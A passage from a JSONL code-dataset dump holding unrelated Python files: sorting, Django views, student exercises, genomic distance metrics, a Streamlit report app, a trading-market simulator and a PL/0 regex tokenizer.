1\n\n return (result, new_list)\n","sub_path":"Sequelizer/src/nlq/temply/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"539457748","text":"import time\nimport numpy as np\n\ndef merge_sort(data):\n\n if len(data) > 1:\n mid = len(data) // 2\n left = data[:mid]\n right = data[mid:]\n\n merge_sort(left)\n merge_sort(right)\n\n i = 0 # for left list\n j = 0 # for right list\n k = 0 # for answer list\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n data[k] = left[i]\n i += 1\n else:\n data[k] = right[j]\n j += 1\n\n k += 1\n\n while i < len(left):\n data[k] = left[i]\n i += 1\n k += 1\n\n while j < len(right):\n data[k] = right[j]\n j += 1\n k += 1\n\n##data = np.random.randint(low = 1, high = 1000, size = 100)\ndata = [5,4,3,2,1]\nprint(\"Before merge sort: {}\".format(data))\nmerge_sort(data)\nprint(\"After merge sort: {}\".format(data))\n","sub_path":"8. Sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"267591664","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom django.views.generic.edit import CreateView, UpdateView\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.utils.decorators import method_decorator\n\nfrom .models import Post\nfrom images.models import Image\n\n# def articles(request):\n# return render(request, 'articles/articles.html', {})\n\nclass PostsView(ListView):\n '''\n List of articles view\n '''\n model = Post\n context_object_name = 'posts'\n template_name = 'articles/articles.html'\n paginate_by = 10\n # Return prepared list of articles\n def get_queryset(self):\n if self.request.LANGUAGE_CODE == 'en':\n qs = Post.objects.filter(is_deleted=False, lang='en').order_by('-timestamp')\n else:\n qs = Post.objects.filter(is_deleted=False, lang='ru').order_by('-timestamp')\n if not self.request.user.is_authenticated() or not self.request.user.is_staff:\n return qs.exclude(is_private=True) \n return qs\n\n# class PostsHomeView(Posts):\n# template_name = 'home.html'\n\n# def get_queryset(self):\n# return super(PostsHome, self).get_queryset().exclude(rating__lt=10)\n\nclass PostDetailView(DetailView):\n '''\n Specific post view\n '''\n model = Post\n context_object_name = 'post_detail'\n template_name = 'articles/article_detail.html'\n # Return specific post by slug or id (raise 404 page if article wasn't found)\n def get_object(self):\n self_slug = self.kwargs.get('slug', None)\n if self_slug:\n return get_object_or_404(Post, slug=self_slug)\n self_pk = self.kwargs.get('pk', None)\n if self_pk:\n return get_object_or_404(Post, pk=self_pk)\n\nclass PostCreateView(CreateView):\n '''\n Form for creating of a new post\n '''\n model = Post\n context_object_name = 'post'\n template_name = 'articles/article_create.html'\n # Fields allowed for editing\n fields = [\n 'title',\n 'slug',\n 'category',\n 'lang',\n 'marked_body',\n 'is_private',\n ] \n # Set requirements\n @method_decorator(permission_required('post.can_create', raise_exception=True))\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(PostCreateView, self).dispatch(*args, **kwargs) \n # Overrided save-method (need for FK correct saving)\n def form_valid(self, form):\n form.instance.body = Post.raw2html(form.instance.marked_body) # Convert content to html\n form.instance.author = self.request.user\n return super(PostCreateView, self).form_valid(form)\n def get_context_data(self, **kwargs):\n context = super(PostCreateView, self).get_context_data(**kwargs)\n context['images'] = Image.objects.all().order_by('-id')[:10]\n return context\n\nclass PostUpdateView(UpdateView):\n '''\n Form for editing of a specific post\n '''\n model = Post\n context_object_name = 'post'\n template_name = 'articles/article_update.html'\n # Fields allowed for editing\n fields = [\n 'title',\n 'slug',\n 'category',\n 'lang',\n 'marked_body',\n 'is_private',\n 'is_deleted',\n ]\n # Set requirements\n @method_decorator(permission_required('post.can_update', raise_exception=True))\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(PostUpdateView, self).dispatch(*args, **kwargs)\n # Overrided save-method\n def form_valid(self, form):\n form.instance.body = Post.raw2html(form.instance.marked_body) # Convert content to html\n return super(PostUpdateView, self).form_valid(form)\n def get_context_data(self, **kwargs):\n context = super(PostUpdateView, self).get_context_data(**kwargs)\n context['images'] = Image.objects.all().order_by('-id')[:10]\n return context\n","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"541364424","text":"#CSC120Lab08Template\r\n\r\n# Declare Variables\r\na = [\"Euclid\", \"Archimedes\", \"Newton\", \"Descartes\", \"Fermat\",\r\n \"Turing\", \"Euler\", \"Einstein\", \"Boole\", \"Fibonacci\",\r\n \"Nash\", \"Wiles\", \"Cantor\", \"Gauss\", \"Plato\"] # Initial list n == 15\r\nq = 0\r\nj = 0\r\ncnt = 1\r\ntotal_lenght = 0\r\nback_list_together= ''\r\nnames = ''\r\nback = ''\r\nback_names = []\r\nall_first_last = []\r\nd = 0\r\nr = 0\r\ntotal_char =0\r\n#1.\tDisplay a string that consists of the first letter and last letter from each of the names in the list a\r\n# The output should look like “EdAsNn etc. use the + operator or the append() function from prior lab\r\n\r\nfor y in a:\r\n names = names + a[q][0] + a[q][-1]\r\n q = q+1\r\nprint(\"1. A string that consists of the first letter and last letter from each of the names in the list is: \",names)\r\n\r\n#2.\tDisplay list a with all the names reversed that is display\r\n#“dilcuE”, sedemihcrA” etc.\r\n\r\nfor y in a:\r\n back = y[::-1]\r\n\r\n all_first_last.append(back)\r\nprint (\"2. A list a with all the names reversed is: \",all_first_last)\r\n\r\n#3.\tDisplay the total number of characters in the list a Hint: Sum the lengths of each name\r\nfor y in a:\r\n back_list_together = back_list_together + a[d]\r\n d = d+1\r\nprint(\"3. The total number of characters in the list a is: \",len(back_list_together))\r\n# 4.\tIn the prior lab we determined the number of vowels in the list. For this lab, display the number of consonants\r\n# (non-vowels) Use your result from 3. to assist in the calculations\r\ncounts = {i:0 for i in 'BCDFGHJKLMNPQRSTVWXYZ'}\r\nback_list_together = back_list_together.upper()\r\nfor char in back_list_together:\r\n if char in counts:\r\n counts[char] += 1\r\n total_char = total_char + len(char)\r\nprint(\"4. The total number of consonants are: \",total_char)\r\n#5.\tDisplay the number of each letter in the list NOTE ignore case ‘A’ and ‘a’ are to be considered the same.\r\nprint( \"5. The total number of each consonants are : \" ,counts,)\r\n#6.\tDisplay the average length of the strings in the list. Remember to use the results from 3 and divide by n\r\nn = len(a)\r\nprint(\"6. The average length of the strings in the list is: \", len(back_list_together) /n )\r\n\r\n\r\n","sub_path":"Sanchez_Fundamentals_Computing_Python_Practice/Sanchez_Lab08.py","file_name":"Sanchez_Lab08.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61798197","text":"\"\"\"This module implements various distance metrics.\"\"\"\n\nimport numpy as np\nfrom numba import guvectorize\n\nfrom sgkit.typing import ArrayLike\n\n\n@guvectorize( # type: ignore\n [\n \"void(float32[:], float32[:], float32[:])\",\n \"void(float64[:], float64[:], float64[:])\",\n \"void(int8[:], int8[:], float64[:])\",\n ],\n \"(n),(n)->()\",\n nopython=True,\n cache=True,\n)\ndef correlation(x: ArrayLike, y: ArrayLike, out: ArrayLike) -> None: # pragma: no cover\n \"\"\"Calculates the correlation between two vectors.\n\n Parameters\n ----------\n x\n [array-like, shape: (M,)]\n A vector\n y\n [array-like, shape: (M,)]\n Another vector\n out\n The output array, which has the output of pearson correlation.\n\n Returns\n -------\n A scalar representing the pearson correlation coefficient between two vectors x and y.\n\n Examples\n --------\n >>> from sgkit.distance.metrics import correlation\n >>> import dask.array as da\n >>> import numpy as np\n >>> x = da.array([4, 3, 2, 3], dtype='i1')\n >>> y = da.array([5, 6, 7, 0], dtype='i1')\n >>> correlation(x, y).compute()\n 1.2626128\n\n >>> correlation(x, x).compute()\n -1.1920929e-07\n \"\"\"\n m = x.shape[0]\n valid_indices = np.zeros(m, dtype=np.float64)\n\n for i in range(m):\n if x[i] >= 0 and y[i] >= 0:\n valid_indices[i] = 1\n\n valid_shape = valid_indices.sum()\n _x = np.zeros(int(valid_shape), dtype=x.dtype)\n _y = np.zeros(int(valid_shape), dtype=y.dtype)\n\n # Ignore missing values\n valid_idx = 0\n for i in range(valid_indices.shape[0]):\n if valid_indices[i] > 0:\n _x[valid_idx] = x[i]\n _y[valid_idx] = y[i]\n valid_idx += 1\n\n cov = ((_x - _x.mean()) * (_y - _y.mean())).sum()\n denom = (_x.std() * _y.std()) / _x.shape[0]\n\n value = np.nan\n if denom > 0:\n value = 1.0 - (cov / (_x.std() * _y.std()) / _x.shape[0])\n out[0] = value\n\n\n@guvectorize( # type: ignore\n [\n \"void(float32[:], float32[:], float32[:])\",\n \"void(float64[:], float64[:], float64[:])\",\n \"void(int8[:], int8[:], float64[:])\",\n ],\n \"(n),(n)->()\",\n nopython=True,\n cache=True,\n)\ndef euclidean(x: ArrayLike, y: ArrayLike, out: ArrayLike) -> None: # pragma: no cover\n \"\"\"Calculates the euclidean distance between two vectors.\n\n Parameters\n ----------\n x\n [array-like, shape: (M,)]\n A vector\n y\n [array-like, shape: (M,)]\n Another vector\n out\n The output scalar, which has the output of euclidean between two vectors.\n\n Returns\n -------\n A scalar representing the euclidean distance between two vectors x and y.\n\n Examples\n --------\n >>> from sgkit.distance.metrics import euclidean\n >>> import dask.array as da\n >>> import numpy as np\n >>> x = da.array([4, 3, 2, 3], dtype='i1')\n >>> y = da.array([5, 6, 7, 0], dtype='i1')\n >>> euclidean(x, y).compute()\n 6.6332495807108\n\n >>> euclidean(x, x).compute()\n 0.0\n\n \"\"\"\n square_sum = 0.0\n m = x.shape[0]\n # Ignore missing values\n for i in range(m):\n if x[i] >= 0 and y[i] >= 0:\n square_sum += (x[i] - y[i]) ** 2\n out[0] = np.sqrt(square_sum)\n","sub_path":"sgkit/distance/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"68891267","text":"import base64\nimport re\nimport pandas as pd\nimport numpy as np\nfrom calendar import Calendar\nimport streamlit as st\nimport MyHelper as mh\nimport my_helper as hp\nimport datetime as dt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n#Application welcome address\n# st.title(\"WELCOME TO THE DEMO VERSION OF OUR MMR REPORT GENERATOR\")\n\n#Import dataset from your PC\nuploaded_files = st.sidebar.file_uploader(\"Upload file\", type=[\"csv\",\"xls\",\"xlsx\"], accept_multiple_files=False)\nif uploaded_files:\n data = pd.read_excel(uploaded_files)\n\n #Import a sample mmr data\n # data = pd.read_excel(\"Daily_report_between_2020-11-09_and_2020-12-09_1608541610.xls\")\n\n #Preprocess the mmr data\n data = mh.PreprocessData(data)\n\n comb_data = pd.DataFrame(columns = data.columns)\n # for media in data[\"Media Type\"].unique():\n\n #---------->GENERATING LISTENERSHIP AND IMPRESSION FOR RADIO<-----------\n #SELECTING MEDIA TYPE\n data = data.copy()[data[\"Media Type\"] == \"Radio\"]\n\n #GENERATING WEEKLY LISTENERS\n #ORIGINAL CODE\n for brand in data[\"Brand\"].unique():\n brand_clean = re.sub(r'[^\\w]', ' ', brand)\n writer = pd.ExcelWriter(f'NEW EXPORT/{brand_clean}.xlsx', engine='xlsxwriter')\n df = data.copy()[data[\"Brand\"] == brand]\n for week in df[\"Week\"].unique():\n week_df = mh.WeeklyListenersData(df, week)\n try:\n listeners = mh.GenerateListeners(week_df, [\"Province\", \"Districts\", \"AREA TYPE\", \"Gender\", \"LSM GROUP\", \"Age Range\"])\n listeners_final = mh.RestructureListeners([\"Province\", \"Districts\", \"AREA TYPE\", \"Gender\", \"LSM GROUP\", \"Age Range\"], df, listeners.copy())\n listeners_final.to_excel(writer, sheet_name=f\"{week}\")\n except:\n listeners_final = pd.DataFrame()\n for item in [\"Province\", \"Districts\", \"AREA TYPE\", \"Gender\", \"LSM GROUP\", \"Age Range\"]:\n listeners = pd.DataFrame(index=week_df[\"Station\"].unique(), columns=week_df[item].unique()).fillna(0)\n listeners[f\"{item.upper()} TOTAL\"] = 0\n listeners_final = pd.concat([listeners_final, listeners], axis=1)\n listeners_final.to_excel(writer, sheet_name=f\"{week}\")\n writer.save()\n\n #IMPRESSION\n impression = mh.Impression(data, [\"Province\"])\n\n #FINAL LISTENERSHIP\n final_listeners = pd.DataFrame()\n for brand in impression[\"Brand\"].unique():\n brand_data = impression[impression[\"Brand\"] == brand]\n for week in sorted(brand_data[\"Week\"].unique()):\n try:\n listeners_df = pd.read_excel(f\"NEW EXPORT/{brand_clean}.xlsx\", sheet_name = week, index_col=0)\n brand_week = brand_data[brand_data[\"Week\"] == week]\n for station in sorted(brand_week[\"Station\"].unique()):\n brand_station = brand_week[brand_week[\"Station\"] == station]\n try:\n brand_station[\"Listeners\"] = int(listeners_df.loc[station][\"PROVINCE TOTAL\"]/brand_station.shape[0])\n except:\n brand_station[\"Listeners\"] = 0\n final_listeners = pd.concat([final_listeners, brand_station])\n except:\n brand_station = pd.DataFrame(columns=[\"Listeners\"])\n brand_station[\"Listeners\"] = 0\n final_listeners = pd.concat([final_listeners, brand_station])\n final_listeners[\"Listeners\"] = final_listeners[[\"IMPRESSION\", \"Listeners\"]].apply(lambda x: 0 if x[\"IMPRESSION\"] == 0 else x[\"Listeners\"], axis=1)\n final_listeners[\"Listeners\"] = final_listeners[[\"IMPRESSION\", \"Listeners\"]].apply(lambda x: int(x[\"Listeners\"]-x[\"IMPRESSION\"])/(x[\"IMPRESSION\"]-x[\"Listeners\"]) if x[\"IMPRESSION\"] < x[\"Listeners\"] else x[\"Listeners\"],axis=1)\n final_listeners[\"Listeners\"] = final_listeners[\"Listeners\"].apply(lambda x: x*(-1) if x<0 else x)\n final_listeners= final_listeners.reset_index(0, True)\n\n\n\n\n\n data = final_listeners.copy()\n data[\"Count\"] = np.ones(data.shape[0])\n for col in [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]:\n data[col] = data[col].astype(int)\n # comb_data = pd.concat([data, comb_data], 1)\n \n # data = comb_data.copy()\n\n #Get columns an thir data types\n column_dtype = dict(data.dtypes)\n\n #For integers and float\n int_columns = []\n for item in column_dtype.keys():\n if (column_dtype[item] == int) | (column_dtype[item] == float):\n int_columns.append(item)\n # int_columns = int_columns.sort()\n\n #For objects\n obj_columns = []\n for item in column_dtype.keys():\n if column_dtype[item] == object:\n obj_columns.append(item)\n # obj_columns = obj_columns.sort()\n\n\n\n sub_menu = [\"Share of Voice Analysis\", \"Advertising Expenditure Analysis\", \n \"Media Type Analysis\", \"Company, Player & Brand Analysis\", \n \"Campaign Analysis\", \"Spot ID Analysis\", \n \"Sub Brand Analysis\", \"Advert Type Analysis\", \n \"Industry Analysis\", \"Media Exposure Analysis\"]\n defaults = {\n \"Share of Voice Analysis\" : [[\"Brand\", \"Media Type\"], [\"Week\"], [\"Duration\", \"Gross\", \"Count\"]],\n \"Advertising Expenditure Analysis\" : [[\"Brand\", \"Media Type\"], [], [\"Gross\", \"Count\"]],\n \"Media Type Analysis\" : [[\"Media Type\", \"Station\"], [], [\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Company, Player & Brand Analysis\" : [[\"Brand\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Campaign Analysis\" : [[\"Media Type\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Spot ID Analysis\" : [[\"Spot ID\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Sub Brand Analysis\" : [[\"SubBrand\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Advert Type Analysis\" : [[\"Media Type\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Industry Analysis\" : [[\"Brand\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Media Exposure Analysis\" : [[\"Media Type\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]]\n }\n\n analysis = st.sidebar.selectbox(\"Select analysis\", sub_menu)\n\n\n #ANALYSIS\n\n #Get the default values for each analysis\n my_default = defaults[analysis]\n value_default = my_default[2]\n row_default = my_default[0]\n column_default = my_default[1]\n\n\n #Print out analysis type\n st.title(analysis.upper())\n\n\n ###Pivot table input \n\n\n #Values, Rows and Columns\n iValues = st.sidebar.multiselect(\"SELECT VALUE\", sorted(int_columns), default = value_default)\n iRows = st.sidebar.multiselect(\"SELECT SEARCH CRITERIA\", sorted(obj_columns), default=row_default)\n iColumns = st.sidebar.selectbox(\"SELECT COLUMN VARIABLES\", sorted(obj_columns, reverse=True))\n\n\n #Get the aggretion function for each value\n aggf = {}\n for item in iValues:\n if item == \"Count\":\n aggf.update({\"Count\":\"count\"})\n else:\n aggf.update({str(item):\"sum\"})\n \n \n #USERS SHOULD SELECT OTHER OPTIONS\n iFilter = st.selectbox(\"FILTER BY WHAT VARIABLE\", sorted(obj_columns))\n filterV = st.multiselect(\"BY WHAT?\", sorted(data[iFilter].unique()))\n\n\n #Apply the filter to generate new dataframe\n filtered_data = pd.DataFrame([])\n for value in filterV:\n filtered_data = pd.concat([filtered_data, data[data[iFilter] == value]])\n\n \n #Pivot table\n try:\n if len(filterV) == 0:\n st.title(\"FULL DATA\")\n piv_table = pd.pivot_table(data, values=iValues, index=iRows, margins=True, margins_name = \"GRAND TOTAL\",\n columns=iColumns, fill_value=0, dropna=True, aggfunc = aggf)\n piv_table = piv_table.astype(int)\n\n #Print table to screen\n piv_html = piv_table.to_html()\n st.markdown(piv_html, unsafe_allow_html=True)\n st.markdown(hp.get_table_download_link(piv_table), unsafe_allow_html=True)\n \n if st.sidebar.button(\"Row Percentage\", key=\"k1\"):\n piv = hp.mmr_row(data, iValues, iColumns, iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n if st.sidebar.button(\"Column Percentage\", key=\"k2\"):\n piv = hp.mmr_col(data, iValues, iColumns,iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n else: \n st.title(\"Filter by {}\".format(iFilter))\n piv_table = pd.pivot_table(filtered_data, \n values=iValues, index=iRows, margins=True, margins_name = \"GRAND TOTAL\",\n columns=iColumns, fill_value=0, dropna=True, aggfunc = aggf)\n piv_table = piv_table.astype(int)\n\n #Print table to screen\n piv_html = piv_table.to_html()\n st.markdown(piv_html, unsafe_allow_html=True)\n st.markdown(hp.get_table_download_link(piv_table), unsafe_allow_html=True)\n \n if st.sidebar.button(\"Row Percentage\", key=\"k1\"):\n piv = hp.mmr_row(filtered_data, \n iValues, iColumns, iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n if st.sidebar.button(\"Column Percentage\", key=\"k2\"):\n piv = hp.mmr_col(filtered_data, \n iValues, iColumns,iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n\n except:\n st.write(\"Please make a valid selection\")\nelse:\n st.header(\"Please import your data in the sidebar\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"28109756","text":"\nimport re\n\nall_users_lines = []\n\nwith open('allusers_applicants.csv') as f:\n all_users_lines = f.read().splitlines()\n\n\ndef printUserLinesFor(firstName):\n for line in all_users_lines:\n if re.search(firstName, line, re.IGNORECASE):\n print(\"Match: \" + firstName + \" : \" + line)\n\n\nwith open('real_names.txt') as f:\n lines = f.read().splitlines()\n for line in lines:\n first = line.split()[0]\n printUserLinesFor(first)\n","sub_path":"utils/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38033484","text":"#Melhore o DESAFIO 061, perguntando para o usuário se ele quer mostrar mais alguns termos. \n #O programa encerrará quando ele disser que quer mostrar 0 termos.\n \nprimeiro_termo = int(input('digite o primeiro termo da PA'))\nrazao = int(input('digite a razão da PA'))\nnum_termos = 0\nsequencia = 0\nultimo_termo = 0\nnumeros_adicionais=1\nprint('os dez primeiros da sequência são:', end=' ')\nwhile num_termos < 10:\n sequencia = primeiro_termo\n primeiro_termo += razao\n num_termos += 1\n print(f'{sequencia}', end=' ')\nwhile not numeros_adicionais==0:\n numeros_adicionais=int(input('\\nquantos termos você quer postar a mais?'))\n inicio = num_termos - 10\n while not inicio==numeros_adicionais:\n primeira_variavel=sequencia+razao\n sequencia+=razao\n inicio+=1\n print(primeira_variavel,end=' ')\nprint('final do programa')\n","sub_path":"Exercicio.62_CV.py","file_name":"Exercicio.62_CV.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478719505","text":"import time\n\n\nwith open(\"src/2020/1/inputs.txt\", \"r\") as f:\n inputs = list(map(int, f.read().splitlines()))\n tic = time.perf_counter()\n\n for i in inputs:\n for j in inputs:\n if i + j == 2020:\n print(i * j)\n\n toc = time.perf_counter()\n print(f\"Exec in: {(toc - tic)/1000} ms\")\n","sub_path":"src/2020/1/python/1.1.py","file_name":"1.1.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74272854","text":"from orders import *\n\n# Trader superclass\n# all Traders have a trader id, bank balance, blotter, and list of orders to execute\nclass Trader:\n\n def __init__(self, ttype, tid, balance, time):\n self.ttype = ttype # what type / strategy this trader is\n self.trader_id = tid # trader unique ID code\n self.balance = balance # money in the bank\n self.blotter = [] # record of trades executed\n self.customer_order = None # customer orders currently being worked (fixed at 1)\n self.n_quotes = 0 # number of quotes live on LOB\n self.willing = 1 # used in ZIP etc\n self.able = 1 # used in ZIP etc\n self.birthtime = time # used when calculating age of a trader/strategy\n self.profitpertime = 0 # profit per unit time\n self.n_trades = 0 # how many trades has this trader done?\n self.lastquote = None # record of what its last quote was\n self.quantity_remaining = 0 # the quantity that has currently been traded from the last quote\n self.BI_threshold = 1 # the quantity threshold which determines when a BI should be used\n self.reputational_score = None # the last notified reputational score of the trader.\n\n\n def __str__(self):\n return '[TID %s type %s balance %s blotter %s customer order %s n_trades %s profitpertime %s]' \\\n % (self.trader_id, self.ttype, self.balance, self.blotter, self.customer_order, self.n_trades, self.profitpertime)\n\n\n def add_order(self, customer_order, verbose):\n # in this version, trader has at most one order,\n # if allow more than one, this needs to be self.orders.append(order)\n if self.n_quotes > 0 :\n # this trader has a live quote on the LOB, from a previous customer order\n # need response to signal cancellation/withdrawal of that quote\n response = 'LOB_Cancel'\n else:\n response = 'Proceed'\n self.customer_order = customer_order\n if verbose : print('add_order < response=%s' % response)\n self.quantity_remaining = customer_order.quantity\n return response\n\n\n def del_order(self):\n # this is lazy: assumes each trader has only one customer order with quantity=1, so deleting sole order\n # CHANGE TO DELETE THE HEAD OF THE LIST AND KEEP THE TAIL\n self.customer_order = None\n\n\n def bookkeep(self, trade, verbose):\n\n outstr=str(self.customer_order)\n\n self.blotter.append(trade) # add trade record to trader's blotter\n # NB What follows is **LAZY** -- assumes all orders are quantity=1\n transactionprice = trade['price']\n if self.customer_order.otype == 'Buy':\n profit = (self.customer_order.price - transactionprice) * trade['quantity']\n elif self.customer_order.otype == 'Sell':\n profit = (transactionprice - self.customer_order.price) * trade['quantity']\n self.balance += profit\n self.n_trades += 1\n self.profitpertime = self.balance/(trade['time'] - self.birthtime)\n\n if verbose: print('%s profit=%d balance=%d profit/time=%d' % (outstr, profit, self.balance, self.profitpertime))\n\n # update the quantity remaining\n self.quantity_remaining -= trade['quantity']\n if self.quantity_remaining == 0:\n self.del_order()\n\n\n # specify how trader responds to events in the market\n # this is a null action, expect it to be overloaded by specific algos\n def respond(self, time, lob, trade, verbose):\n return None\n\n # specify how trader mutates its parameter values\n # this is a null action, expect it to be overloaded by specific algos\n def mutate(self, time, lob, trade, verbose):\n return None\n\n\n# Modified Giveaway Trader\nclass Trader_BDS_Giveaway(Trader):\n\n def getorder(self, time):\n # if the trader has no customer order then return None\n if self.customer_order == None:\n order = None\n\n elif self.quantity_remaining > 0:\n\n # if the quantity remaining is above the BI threshold then issue a block indication\n if self.quantity_remaining >= self.BI_threshold:\n\n # the minimum execution size for the order\n MES = 100\n\n # create the block indication\n block_indication = Block_Indication(time,\n self.trader_id,\n self.customer_order.otype,\n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the lastquote member variable\n self.lastquote = block_indication\n\n # return the block indication\n return block_indication\n\n # otherwise issue a normal order\n else:\n\n # the minimum exeuction size for the order\n MES = None\n\n # create the order\n order = Order(time, \n self.trader_id, \n self.customer_order.otype,\n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the last quote member variable\n self.lastquote=order\n\n # return the order\n return order\n\n # the trader recieves an Order Submission Request (OSR). The trader needs to respond with a\n # Qualifying Block Order (QBO) in order to confirm their block indication. \n def get_qualifying_block_order(self, time, OSR):\n\n # Update the traders reputationa score\n self.reputational_score = OSR.reputational_score\n \n quantity = OSR.quantity * 0.5\n limit_price = OSR.limit_price\n MES = OSR.MES\n\n # create a QBO from the received OSR\n QBO = Qualifying_Block_Order(time, \n OSR.trader_id, \n OSR.otype, \n quantity,\n limit_price,\n MES, \n OSR.match_id)\n # return the created QBO\n return QBO\n\n # if the block indication or the qualifying block order failed\n def BDS_failure(self, info):\n return\n\n\n# This trader's behaviour is deterministic and is used for testing purposes\nclass Trader_BDS_Giveaway_test(Trader):\n\n def getorder(self, time):\n # if the trader has no customer order then return None\n if self.customer_order == None:\n order = None\n\n elif self.quantity_remaining > 0:\n\n # if the quantity remaining is above the BI threshold then issue a block indication\n if self.quantity_remaining >= self.BI_threshold:\n \n MES = 20\n\n # create the block indication\n block_indication = Block_Indication(time,\n self.trader_id,\n self.customer_order.otype,\n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the lastquote member variable\n self.lastquote = block_indication\n\n # return the block indication\n return block_indication\n\n # otherwise issue a normal order\n else: \n \n MES = 2\n\n # create the order\n order = Order(time, \n self.trader_id, \n self.customer_order.otype, \n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the last quote member variable\n self.lastquote=order\n\n #return the order\n return order\n\n # the trader recieves an Order Submission Request (OSR). The trader needs to respond with a\n # Qualifying Block Order (QBO) in order to confirm their block indication. \n def get_qualifying_block_order(self, time, OSR):\n\n # Update the traders reputationa score\n self.reputational_score = OSR.reputational_score\n \n # If we are testing then use a deterministic quantity\n quantity = OSR.quantity - 100\n limit_price = OSR.limit_price\n MES = OSR.MES\n\n # create a QBO from the received OSR\n QBO = Qualifying_Block_Order(time, \n OSR.trader_id, \n OSR.otype, \n quantity,\n limit_price,\n MES, \n OSR.match_id)\n # return the created QBO\n return QBO\n\n # if the block indication or the qualifying block order failed\n def BDS_failure(self, info):\n return\n","sub_path":"dark_pool/trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":9480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"615031210","text":"import requests\nimport random\nimport csv\n\n\ndef get_unique_quote(number):\n unique_quotes = []\n quote_dict = {}\n while len(unique_quotes) != number:\n url = \"http://api.forismatic.com/api/1.0/\"\n params = {\"method\": \"getQuote\",\n \"format\": \"json\",\n \"key\": random.randint(1, 999999)\n }\n response = requests.get(url, params=params)\n raw_quote = response.json()\n if len(raw_quote['quoteAuthor']) != 0:\n quote_dict['Author'] = raw_quote['quoteAuthor']\n quote_dict['Quote'] = raw_quote['quoteText']\n quote_dict['URL'] = raw_quote['quoteLink']\n unique_quotes.append(quote_dict)\n quote_dict = {}\n return unique_quotes\n\n\ndef write_to_csv(number, filename='unique_quotes.csv'):\n data = get_unique_quote(number)\n sorted_data_by_author_name = sorted(data, key=lambda x: x.get('Author'))\n fieldnames = data[0].keys()\n with open(filename, \"w\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(sorted_data_by_author_name)\n\n\nwrite_to_csv(5)","sub_path":"homework/dz12.py","file_name":"dz12.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"151236959","text":"#\n# docs:\n# https://docs.python.org/3/howto/regex.html\n# https://docs.python.org/3.4/library/re.html\n#\n\nimport re\n\nfile_name='data/sample.pl0.in'\nstream=\"\"\n\n\nwith open(file_name) as f:\n\tstream = f.read()\n\n#print(stream)\n\n#\n# replace keywords with KEYWORD\n# and save in sample.pl0.py.keywords.out \n#\nkeywords = re.compile('(const|var|procedure|call|begin|end|if|then|while|do)(\\W)', re.IGNORECASE)\nkeywords_stream = re.sub(keywords, 'KEYWORD\\g<2>', stream)\nwith open('data/sample.pl0.py.keywords.out', 'w+') as out:\n out.write(keywords_stream)\n#print(keywords_stream)\n\n\n#\n# replace comments with COMMENT\n# and save in sample.pl0.py.comments.out \n#\ncomments = re.compile('(\\s*)(\\/\\/.*)', re.IGNORECASE)\ncomments_stream = re.sub(comments, '\\g<1>COMMENT', stream)\nwith open('data/sample.pl0.py.comments.out', 'w+') as out:\n out.write(comments_stream)\n#print(comments_stream)\n\n#\n# replace identifiers with IDENTIFIER\n# and save in sample.pl0.py.identifiers.out 